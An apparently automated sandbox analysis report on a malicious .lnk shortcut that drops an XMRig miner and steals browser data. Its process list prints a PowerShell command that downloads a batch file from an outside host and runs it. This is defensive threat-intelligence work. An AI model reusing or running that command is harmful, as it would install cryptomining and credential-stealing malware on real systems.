Malware Analysis Report

2024-12-07 17:18

Sample ID 241112-s52l5avkdv
Target 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk
SHA256 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5
Tags
execution xmrig credential_access defense_evasion discovery miner spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5

Threat Level: Known bad

The file 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk was found to be: Known bad.

Malicious Activity Summary

execution xmrig credential_access defense_evasion discovery miner spyware stealer

xmrig

Xmrig family

XMRig Miner payload

Uses browser remote debugging

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Drops startup file

Loads dropped DLL

Reads user/profile data of web browsers

Checks computer location settings

Looks up external IP address via web service

Hide Artifacts: Hidden Window

Drops file in System32 directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Modifies registry class

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 15:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 15:43

Reported

2024-11-12 15:46

Platform

win7-20240903-en

Max time kernel

118s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -URI https://sealingshop.click/bat/encode/bostar1_en.txt?info=df345rs -OutFile C:/Users/Public/img.bat;powershell C:/Users/Public/img.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:/Users/Public/img.bat

Network

N/A

Files

memory/2692-38-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

memory/2692-39-0x000000001B620000-0x000000001B902000-memory.dmp

memory/2692-40-0x0000000001F60000-0x0000000001F68000-memory.dmp

memory/2692-41-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-42-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-43-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-44-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-49-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 15:43

Reported

2024-11-12 15:46

Platform

win10v2004-20241007-en

Max time kernel

117s

Max time network

158s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A

Reads user/profile data of web browsers

spyware stealer

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\exe\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\DLL\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\DLL\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\exe\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Public\PublicAlbums\xmrig.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3216 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2696 wrote to memory of 1900 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 1900 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2696 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 1532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 1532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
